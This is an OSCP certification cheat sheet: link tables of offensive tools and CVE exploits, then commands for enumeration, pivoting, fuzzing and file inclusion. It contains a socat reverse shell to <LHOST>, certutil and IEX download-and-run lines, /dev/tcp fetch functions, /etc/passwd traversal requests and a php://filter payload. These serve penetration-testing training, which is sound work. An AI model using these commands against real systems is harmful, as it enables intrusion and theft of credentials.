OSCP Cheat Sheet

Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.

Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam. Feel free to submit a pull request or reach out to me on Twitter for suggestions.

Every help or hint is appreciate it!

DISCLAIMER: A guy on Twitter got a point. Automatic exploitation tools like sqlmap are prohibited to use in the exam. The same goes for the automatic exploitation functionality of LinPEAS. I am not keeping track of current guidelines related to those tools. For that I want to point out that I am not responsible if anybody uses a tool without double checking the latest exam restrictions and fails the exam. Inform yourself before taking the exam!

I removed sqlmap because of the reasons above but Metasploit is still part of the guide because you can use it for one specific module. Thank you Muztahidul Tanim for making me aware and to Yeeb for the resources.

Here are the link to the OSCP Exam Guide and the discussion about LinPEAS. I hope this helps.

Name	URL
Nmap	https://github.com/nmap/nmap
enum4linux-ng	https://github.com/cddmp/enum4linux-ng
BloodHound	https://github.com/BloodHoundAD/BloodHound
BloodHound Docker	https://github.com/belane/docker-bloodhound
BloodHound Python	https://github.com/fox-it/BloodHound.py
pspy	https://github.com/DominicBreuker/pspy
RustHound	https://github.com/OPENCYBER-FR/RustHound
SharpHound	https://github.com/BloodHoundAD/SharpHound

Vulnerability Analysis

Name	URL
nikto	https://github.com/sullo/nikto
Sparta	https://github.com/SECFORCE/sparta

Web Application Analysis

Name	URL
WPScan	https://github.com/wpscanteam/wpscan
WhatWeb	https://github.com/urbanadventurer/WhatWeb
Gobuster	https://github.com/OJ/gobuster
ffuf	https://github.com/ffuf/ffuf
Wfuzz	https://github.com/xmendez/wfuzz
httpx	https://github.com/projectdiscovery/httpx
JSON Web Tokens	https://jwt.io
JWT_Tool	https://github.com/ticarpi/jwt_tool
fpmvuln	https://github.com/hannob/fpmvuln
PHPGGC	https://github.com/ambionics/phpggc
PHP Filter Chain Generator	https://github.com/synacktiv/php_filter_chain_generator
ysoserial	https://github.com/frohoff/ysoserial
Leaky Paths	https://github.com/ayoubfathi/leaky-paths
Weird Proxies	https://github.com/GrrrDog/weird_proxies
SSRF testing resources	https://github.com/cujanovic/SSRF-Testing
PayloadsAllTheThings	https://github.com/swisskyrepo/PayloadsAllTheThings

Password Attacks

Name	URL
Hydra	https://github.com/vanhauser-thc/thc-hydra
Patator	https://github.com/lanjelot/patator
Kerbrute	https://github.com/ropnop/kerbrute
CrackMapExec	https://github.com/byt3bl33d3r/CrackMapExec
SprayingToolkit	https://github.com/byt3bl33d3r/SprayingToolkit
John	https://github.com/openwall/john
hashcat	https://hashcat.net/hashcat
LaZagne	https://github.com/AlessandroZ/LaZagne
mimikatz	https://github.com/gentilkiwi/mimikatz
pypykatz	https://github.com/skelsec/pypykatz
RsaCtfTool	https://github.com/Ganapati/RsaCtfTool
Default Credentials Cheat Sheet	https://github.com/ihebski/DefaultCreds-cheat-sheet

Reverse Engineering

Name	URL
binwalk	https://github.com/ReFirmLabs/binwalk
ImHex	https://github.com/WerWolv/ImHex
JD-GUI	https://github.com/java-decompiler/jd-gui
dnSpy	https://github.com/dnSpy/dnSpy
AvalonialLSpy	https://github.com/icsharpcode/AvaloniaILSpy
ghidra	https://github.com/NationalSecurityAgency/ghidra
pwndbg	https://github.com/pwndbg/pwndbg
cutter	https://github.com/rizinorg/cutter
Radare2	https://github.com/radareorg/radare2
GEF	https://github.com/hugsy/gef
peda	https://github.com/longld/peda

Exploitation Tools

Name	URL
ImageTragick	https://imagetragick.com
MSL / Polyglot Attack	https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
Evil-WinRM	https://github.com/Hackplayers/evil-winrm
Metasploit	https://github.com/rapid7/metasploit-framework

Post Exploitation

Name	URL
pwncat	https://github.com/calebstewart/pwncat
PEASS-ng	https://github.com/carlospolop/PEASS-ng
LinEnum	https://github.com/rebootuser/LinEnum
JAWS	https://github.com/411Hall/JAWS
Watson	https://github.com/rasta-mouse/Watson
WESNG	https://github.com/bitsadmin/wesng
Sherlock	https://github.com/rasta-mouse/Sherlock
scavenger	https://github.com/SpiderLabs/scavenger
WADComs	https://wadcoms.github.io
GTFOBins	https://gtfobins.github.io
LOLBAS	https://lolbas-project.github.io
lsassy	https://github.com/Hackndo/lsassy
PPLdump	https://github.com/itm4n/PPLdump
nanodump	https://github.com/helpsystems/nanodump
LAPSDumper	https://github.com/n00py/LAPSDumper
Certipy	https://github.com/ly4k/Certipy
Whisker	https://github.com/eladshamir/Whisker
PyWhisker	https://github.com/ShutdownRepo/pywhisker
Rubeus	https://github.com/GhostPack/Rubeus
pth-toolkit	https://github.com/byt3bl33d3r/pth-toolkit
Impacket	https://github.com/fortra/impacket
RunasCs	https://github.com/antonioCoco/RunasCs
Villain	https://github.com/t3l3machus/Villain
powercat	https://github.com/besimorhino/powercat
PowerUp	https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
PowerView	https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
SharpCollection	https://github.com/Flangvik/SharpCollection
PowerSharpPack	https://github.com/S3cur3Th1sSh1t/PowerSharpPack
Windows-privesc-check	https://github.com/pentestmonkey/windows-privesc-check
Windows Privilege Escalation	https://github.com/frizb/Windows-Privilege-Escalation
Windows Privilege Escalation Fundamentals	https://www.fuzzysecurity.com/tutorials/16.html
Priv2Admin	https://github.com/gtworek/Priv2Admin

CVEs

CVE	Descritpion	URL
CVE-2014-6271	Shellshock PoC	https://github.com/zalalov/CVE-2014-6271
CVE-2016-5195	Dirty COW	https://github.com/firefart/dirtycow
CVE-2017-0199	RTF Dynamite	https://github.com/bhdresh/CVE-2017-0199
CVE-2018-10933	libSSH Authentication Bypass	https://github.com/blacknbunny/CVE-2018-10933
CVE-2018-16509	Ghostscript	https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509
CVE-2019-18634	sudo	https://github.com/saleemrashid/sudo-cve-2019-18634
CVE-2019-5736	Exploiting RunC	https://github.com/Frichetten/CVE-2019-5736-PoC
CVE-2019-6447	ES File Explorer Open Port Vulnerability	https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
CVE-2019-7304	dirty_sock	https://github.com/initstring/dirty_sock
CVE-2020-1472	ZeroLogon Testing Script	https://github.com/SecuraBV/CVE-2020-1472
CVE-2020-1472	ZeroLogon Exploitation Script	https://github.com/risksense/zerologon
CVE-2021-1675,CVE-2021-34527	PrintNightmare	https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527
CVE-2021-1675	PrintNightmare LPE (PowerShell)	https://github.com/calebstewart/CVE-2021-1675
CVE-2021-21972	vCenter RCE	https://github.com/horizon3ai/CVE-2021-21972
CVE-2021-22204	GitLab Exiftool RCE	https://github.com/CsEnox/Gitlab-Exiftool-RCE
CVE-2021-22204	GitLab Exiftool RCE Python Implementation	https://github.com/convisolabs/CVE-2021-22204-exiftool
CVE-2021-26085	Confluence Server RCE	https://github.com/Phuong39/CVE-2021-26085
CVE-2021-27928	MariaDB/MySQL-'wsrep provider'	https://github.com/Al1ex/CVE-2021-27928
CVE-2021-3129	Laravel Framework RCE	https://github.com/nth347/CVE-2021-3129_exploit
CVE-2021-3156	Sudo 1.8.31 Root Exploit	https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit
CVE-2021-3560	PwnKit C Implementation	https://github.com/hakivvi/CVE-2021-3560
CVE-2021-3560	polkit Privilege Escalation	https://github.com/Almorabea/Polkit-exploit
CVE-2021-3560	polkit Privilege Esclation PoC	https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
CVE-2021-36934	HiveNightmare	https://github.com/GossiTheDog/HiveNightmare
CVE-2021-4034	Pkexec Self-contained Exploit	https://github.com/ly4k/PwnKit
CVE-2021-4034	PoC for PwnKit (1)	https://github.com/dzonerzy/poc-cve-2021-4034
CVE-2021-4034	PoC for PwnKit (2)	https://github.com/arthepsy/CVE-2021-4034
CVE-2021-4034	PoC for PwnKit (3)	https://github.com/nikaiw/CVE-2021-4034
CVE-2021-40444	MSHTML builders	https://github.com/aslitsecurity/CVE-2021-40444_builders
CVE-2021-40444	MSHTML Exploit	https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
CVE-2021-40444	MSHTML PoC	https://github.com/lockedbyte/CVE-2021-40444
CVE-2021-41379	InstallerFileTakeOver	https://github.com/klinix5/InstallerFileTakeOver
CVE-2021-41773,CVE-2021-42013, CVE-2020-17519	SimplesApachePathTraversal	https://github.com/MrCl0wnLab/SimplesApachePathTraversal
CVE-2021-42278,CVE-2021-42287	sam-the-admin	https://github.com/WazeHell/sam-the-admin
CVE-2021-42278	sam-the-admin Python Implementation	https://github.com/ly4k/Pachine
CVE-2021-42287,CVE-2021-42278	noPac (1)	https://github.com/cube0x0/noPac
CVE-2021-42287,CVE-2021-42278	noPac (2)	https://github.com/Ridter/noPac
CVE-2021-42321	Microsoft Exchange Server RCE	https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
CVE-2021-44228	Log4Shell	https://github.com/kozmer/log4j-shell-poc
CVE-2021-44228	LogMePwn	https://github.com/0xInfection/LogMePwn
CVE-2022-0847	DirtyPipe-Exploits	https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
CVE-2022-21999	SpoolFool	https://github.com/ly4k/SpoolFool
CVE-2022-22963	Spring4Shell	https://github.com/tweedge/springcore-0day-en
CVE-2022-23119,CVE-2022-23120	Trend Micro Deep Security Agent for Linux Arbitrary File Read	https://github.com/modzero/MZ-21-02-Trendmicro
CVE-2022-26134	ConfluentPwn	https://github.com/redhuntlabs/ConfluentPwn
CVE-2022-30190	MS-MSDT Follina Attach Vector	https://github.com/JohnHammond/msdt-follina
CVE-2022-30190	MS-MSDT Follina Exploit PoC	https://github.com/onecloudemoji/CVE-2022-30190
CVE-2022-30190	MS-MSDT Follina Exploit Python Implementation	https://github.com/chvancooten/follina.py
CVE-2022-34918	LPE Netfilter Kernel Exploit	https://github.com/randorisec/CVE-2022-34918-LPE-PoC
CVE-2023-21746	Windows NTLM EoP (LocalPotato)	Waiting for PoC Release (https://twitter.com/decoder_it/status/1612883878322278402?s=09)
n/a	SeBackupPrivilege	https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
n/a	RoguePotato	https://github.com/antonioCoco/RoguePotato
n/a	RottenPotatoNG	https://github.com/breenmachine/RottenPotatoNG
n/a	GenericPotato	https://github.com/micahvandeusen/GenericPotato
n/a	JuicyPotato	https://github.com/ohpe/juicy-potato
n/a	JuicyPotatoNG	https://github.com/antonioCoco/JuicyPotatoNG
n/a	MultiPotato	https://github.com/S3cur3Th1sSh1t/MultiPotato
n/a	SharpEfsPotato	https://github.com/bugch3ck/SharpEfsPotato
n/a	PrintSpoofer (1)	https://github.com/dievus/printspoofer
n/a	PrintSpoofer (2)	https://github.com/itm4n/PrintSpoofer
n/a	Shocker (1)	https://github.com/gabrtv/shocker
n/a	Shocker (2)	https://github.com/nccgroup/shocker
n/a	SystemNightmare	https://github.com/GossiTheDog/SystemNightmare
n/a	PetitPotam	https://github.com/topotam/PetitPotam
n/a	DFSCoerce MS-DFSNM Exploit	https://github.com/Wh04m1001/DFSCoerce
n/a	Kernelhub	https://github.com/Ascotbe/Kernelhub
n/a	Windows Exploits	https://github.com/SecWiki/windows-kernel-exploits
n/a	Pre-compiled Windows Exploits	https://github.com/abatchy17/WindowsExploits

Exploiting

Name	URL
PwnTools	https://github.com/Gallopsled/pwntools
checksec	https://github.com/slimm609/checksec.sh
mona	https://github.com/corelan/mona
Ropper	https://github.com/sashs/Ropper
Buffer Overflow	https://github.com/gh0x0st/Buffer_Overflow

Payloads

Name	URL
phpgcc	https://github.com/ambionics/phpggc
unicorn	https://github.com/trustedsec/unicorn
nishang	https://github.com/samratashok/nishang
Shikata Ga Nai	https://github.com/EgeBalci/sgn
Veil	https://github.com/Veil-Framework/Veil
Donut	https://github.com/TheWover/donut
Freeze	https://github.com/optiv/Freeze
ScareCrow	https://github.com/optiv/ScareCrow
PowerLine	https://github.com/fullmetalcache/powerline
woodpecker	https://github.com/woodpecker-appstore/log4j-payload-generator
marshalsec	https://github.com/mbechler/marshalsec
ysoserial	https://github.com/frohoff/ysoserial
ysoserial.net	https://github.com/pwntester/ysoserial.net
AMSI.fail	http://amsi.fail
hoaxshell	https://github.com/t3l3machus/hoaxshell
Invoke-Obfuscation	https://github.com/danielbohannon/Invoke-Obfuscation
Raikia's Hub Powershell Encoder	https://raikia.com/tool-powershell-encoder/
webshell	https://github.com/tennc/webshell
Web-Shells	https://github.com/TheBinitGhimire/Web-Shells
PHP-Reverse-Shell	https://github.com/ivan-sincek/php-reverse-shell
Payload Box	https://github.com/payloadbox
PayloadsAllTheThings	https://github.com/swisskyrepo/PayloadsAllTheThings

Wordlists

Name	URL
CeWL	https://github.com/digininja/cewl
CUPP	https://github.com/Mebus/cupp
COOK	https://github.com/giteshnxtlvl/cook
bopscrk	https://github.com/R3nt0n/bopscrk
Kerberos Username Enumeration	https://github.com/attackdebris/kerberos_enum_userlists
SecLists	https://github.com/danielmiessler/SecLists

Social Media Resources

Name	URL
IppSec (YouTube)	https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
IppSec.rocks	https://ippsec.rocks/?#
0xdf	https://0xdf.gitlab.io/
HackTricks	https://book.hacktricks.xyz/
Hacking Articles	https://www.hackingarticles.in/
Rana Khalil	https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

Commands

Basics

CentOS

doas -u <USERNAME> /bin/sh

curl

curl -v http://<RHOST>
curl -k <RHOST>
curl -X POST http://<RHOST>
curl -I POST http://<RHOST>
curl -X PUT http://<RHOST>
curl -vvv <RHOST>
curl --head http://<RHOST>/
curl --proxy http://127.0.0.1:8080
curl -X POST http://<RHOST>/select --data 'db=whatever|id'
curl --path-as-is http://<RHOST>/../../../../../../etc/passwd
curl -s "http://<RHOST>/reports.php?report=2589" | grep Do -A8 | html2text

Chisel

Reverse Pivot

./chisel server -p 9002 -reverse -v
./chisel client <RHOST>:9002 R:9003:127.0.0.1:8888

SOCKS5 / Proxychains Configuration

./chisel server -p 9002 -reverse -v
./chisel client <RHOST>:9002 R:socks

dir

dir flag* /s /p
dir /s /b *.log

Environment Variables

export PATH=`pwd`:$PATH

File Transfer

Certutil

certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>

Netcat

nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>

Impacket

sudo python3 impacket/examples/smbserver.py <SHARE> ./
sudo impacket-smbserver <SHARE> . -smb2support

copy * \\<LHOST>\<SHARE>
powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE>
IEX(IWR http://<LHOST>/<FILE>) -UseBasicParsing)

Bash only

wget version

Paste directly to the shell.

function __wget() {
    : ${DEBUG:=0}
    local URL=$1
    local tag="Connection: close"
    local mark=0

    if [ -z "${URL}" ]; then
        printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \
               "${FUNCNAME[0]}" "${FUNCNAME[0]}"
        return 1;
    fi
    read proto server path <<<$(echo ${URL//// })
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"
    [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"
    [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"

    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
    while read line; do
        [[ $mark -eq 1 ]] && echo $line
        if [[ "${line}" =~ "${tag}" ]]; then
            mark=1
        fi
    done <&3
    exec 3>&-
}

__wget http://<LHOST>/<FILE>

curl version

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

__curl http://<LHOST>/<FILE> > <OUTPUT_FILE>

gcc

gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc -o main32.exe main.c
x86_64-w64-mingw32-gcc -o main64.exe main.c

getfacl

getfacl <LOCAL_DIRECTORY>

Kerberos

/etc/krb5.conf                   // kerberos configuration file location
kinit <USERNAME>                 // creating ticket request
klist                            // show available kerberos tickets
kdestroy                         // delete cached kerberos tickets
.k5login                         // resides kerberos principals for login (place in home directory)
krb5.keytab                      // "key table" file for one or more principals
kadmin                           // kerberos administration console
add_principal <EMAIL>            // add a new user to a keytab file
ksu                              // executes a command with kerberos authentication
klist -k /etc/krb5.keytab        // lists keytab file
kadmin -p kadmin/<EMAIL> -k -t /etc/krb5.keytab    // enables editing of the keytab file

PHP Webserver

sudo php -S 127.0.0.1:80

Ping

ping -c 1 <RHOST>
ping -n 1 <RHOST>

Python Webserver

sudo python -m SimpleHTTPServer 80
sudo python3 -m http.server 80

RDP

xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> +clipboard
xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /h:1010 /w:1920
rdesktop <RHOST>

showmount

/usr/sbin/showmount -e <RHOST>
sudo showmount -e <RHOST>
chown root:root sid-shell; chmod +s sid-shell

smbclient

smbclient -L ////<RHOST>/ -N
smbclient //<RHOST>/<FOLDER> -N
smbclient \\\\<RHOST>/<FOLDER> -N
smbclient -U "<USERNAME>" -L \\\\<RHOST>\\
smbclient -L //<RHOST>// -U <USERNAME>%<PASSWORD>
smbclient //<RHOST>/SYSVOL -U <USERNAME>%<PASSWORD>
smbclient \\\\<RHOST>\\<SHARE> -U '<USERNAME>' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000

Download multiple files at once

mask""
recurse ON
prompt OFF
mget *

socat

socat TCP-LISTEN:<LPORT>,fork TCP:<RHOST>:<RPORT>

socat file:`tty`,raw,echo=0 tcp-listen:<LPORT>
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST>:<LPORT>

socat tcp-listen:5986,reuseaddr,fork tcp:<RHOST>:9002
socat tcp-listen:9002,reuseaddr,fork tcp:192.168.122.228:5968 &

SSH

ssh user@<RHOST> -oKexAlgorithms=+diffie-hellman-group1-sha1

ssh -R 8080:<LHOST>:80 <RHOST>
ssh -L 8000:127.0.0.1:8000 <USERNAME>@<RHOST>
ssh -N -L 1234:127.0.0.1:1234 <USERNAME>@<RHOST>

ssh -L 80:<LHOST>:80 <RHOST>
ssh -L 127.0.0.1:80:<LHOST>:80 <RHOST>
ssh -L 80:localhost:80 <RHOST>

Time and Date

Get the Server Time

sudo nmap -sU -p 123 --script ntp-info <RHOST>

Stop virtualbox-guest-utils to stop syncing Time

sudo /etc/init.d/virtualbox-guest-utils stop

Disable automatic Sync

sudo systemctl disable --now chronyd

Options to set the Date and Time

sudo net time -c <RHOST>
sudo net time set -S <RHOST>
sudo ntpdate -b -u <RHOST>
sudo timedatectl set-timezone UTC
sudo timedatectl list-timezones
sudo timedatectl set-timezone '<COUNTRY>/<CITY>'
sudo timedatectl set-time 15:58:30
sudo timedatectl set-time '2015-11-20 16:14:50'
sudo timedatectl set-local-rtc 1

Keep in Sync with a Server

while [ 1 ]; do sudo ntpdate <RHOST>;done

tmux

ctrl b + w    # show windows
ctrl + "      # split window horizontal
ctrl + %      # split window vertical
ctrl + ,      # rename window
ctrl + {      # flip window
ctrl + }      # flip window
ctrl + spacebar    # switch pane layout

Copy & Paste

:setw -g mode-keys vi

1. ctrl b + [
2. space
3. enter
4. ctrl b + ]

Search

ctrl b + [    # enter copy
ctrl + /      # enter search while within copy mode for vi mode
n             # search next
shift + n     # reverse search

Upgrading Shells

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl + z
stty raw -echo
fg
Enter
Enter
export XTERM=xterm

vi

:w !sudo tee %    # save file with elevated privileges without exiting

VirtualBox

sudo pkill VBoxClient && VBoxClient --clipboard

virtualenv

sudo apt-get install virtualenv
virtualenv -p python2.7 venv
. venv/bin/activate

python.exe -m pip install virtualenv
python.exe -m virtualenv venv
venv\Scripts\activate

Windows Command Formatting

echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0

Information Gathering

Nmap

sudo nmap -A -T4 -sC -sV -p- <RHOST>
sudo nmap -sV -sU <RHOST>
sudo nmap -A -T4 -sC -sV --script vuln <RHOST>
sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <RHOST>
sudo nmap -sC -sV -p- --scan-delay 5s <RHOST>
sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <RHOST>
ls -lh /usr/share/nmap/scripts/*ssh*
locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb

BloodHound

pip install bloodhound
sudo apt-get install neo4j
sudo apt-get install bloodhound

Installing and starting Database

wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
sudo echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
sudo apt-get install apt-transport-https
sudo apt-get install neo4j
systemctl start neo4j

sudo neo4j start console
sudo bloodhound --no-sandbox

http://localhost:7474/browser/

BloodHound Python

bloodhound-python -d <DOMAIN> -u <USERNAME> -p "<PASSWORD>" -gc <DOMAIN> -c all -ns <RHOST>
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -ns <RHOST> -d <DOMAIN> -c All

Certify

.\Certify.exe find /vulnerable /currentuser

enum4linux-ng

enum4linux-ng -A <RHOST>

ldapsearch

ldapsearch -x -w <PASSWORD>
ldapsearch -x -h <RHOST> -s base namingcontexts
ldapsearch -x -b "dc=<RHOST>,dc=local" "*" -h <RHOST> | awk '/dn: / {print $2}'
ldapsearch -x -D "cn=admin,dc=<RHOST>,dc=local" -s sub "cn=*" -h <RHOST> | awk '/uid: /{print $2}' | nl
ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
ldapsearch -x -h <RHOST> -D "<USERNAME>"  -b "dc=<RHOST>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

memcached

https://github.com/pd4d10/memcached-cli

memcrashed / 11211/UDP

npm install -g memcached-cli
memcached-cli <USERNAME>:<PASSWORD>@<RHOST>:11211
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 127.0.0.1 11211

STAT pid 21357
STAT uptime 41557034
STAT time 1519734962

sudo nmap <RHOST> -p 11211 -sU -sS --script memcached-info

stats items
stats cachedump 1 0
get link
get file
get user
get passwd
get account
get username
get password

NetBIOS

nbtscan <RHOST>
nmblookup -A <RHOST>

rpclient

$ rpcclient -U "" <RHOST>

srvinfo
netshareenum
netshareenumall
netsharegetinfo
netfileenum
netsessenum
netdiskenum
netconnenum
getanydcname
getdcname
dsr_getdcname
dsr_getdcnameex
dsr_getdcnameex2
dsr_getsitename
enumdomusers
enumdata
enumjobs
enumports
enumprivs
queryuser <USERNAME>

snmpwalk

snmpwalk -c public -v1 <RHOST>
snmpwalk -v2c -c public <RHOST> 1.3.6.1.2.1.4.34.1.3
snmpwalk -v2c -c public <RHOST> .1
snmpwalk -v2c -c public <RHOST> nsExtendObjects
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.25
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.25.4.2.1.2
snmpwalk -c public -v1 <RHOST> .1.3.6.1.2.1.1.5
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.3.1.1
snmpwalk -c public -v1 <RHOST> 1.3.6.1.4.1.77.1.2.27
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.6.13.1.3
snmpwalk -c public -v1 <RHOST> 1.3.6.1.2.1.25.6.3.1.2

Web Application Analysis

Burp Suite

Ctrl+r          // Sending request to repeater
Ctrl+i          // Sending request to intruder
Ctrl+Shift+b    // base64 encoding
Ctrl+Shift+u    // URL decoding

ffuf

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185
ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<RHOST>/backups/backup_2020070416FUZZ.zip

API Fuzzing

ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412

Looging for LFI

ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349

Fuzzing with PHP Session ID

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt  -u "http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644

Recursion

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/basic/FUZZ -recursion

File Extensions

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/ext/logs/FUZZ -e .log

Rate Limiting

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://<RHOST>/cd/rate/FUZZ -mc 200,429

Virtual Host Discovery

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -fs 1495

Massive File Extension Discovery

ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip

GitTools

./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/

Gobuster

-e    // extended mode that renders the full url
-k    // skip ssl certificate validation
-r    // follow cedirects
-s    // status codes
-b    // exclude status codes
-k            // ignore certificates
--wildcard    // set wildcard option

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>/ -x php
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<RHOST>/ -x php,txt,html,js -e -s 200
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<RHOST>:<RPORT>/ -b 200 -k --wildcard

Common File Extensions

txt,bak,php,html,js,asp,aspx

Common Picture Extensions

png,jpg,jpeg,gif,bmp

POST Requests

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200

DNS Recon

gobuster dns -d <RHOST> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

VHost Discovery

gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

Specifiy User Agent

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ -a Linux

Local File Inclusion (LFI)

http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd

Until php 5.3

http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd%00

Null Byte

%00
0x00

Encoded Traversal Strings

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

php://filter Wrapper

https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter

url=php://filter/convert.base64-encode/resource=file:////var/www/<RHOST>/api.php

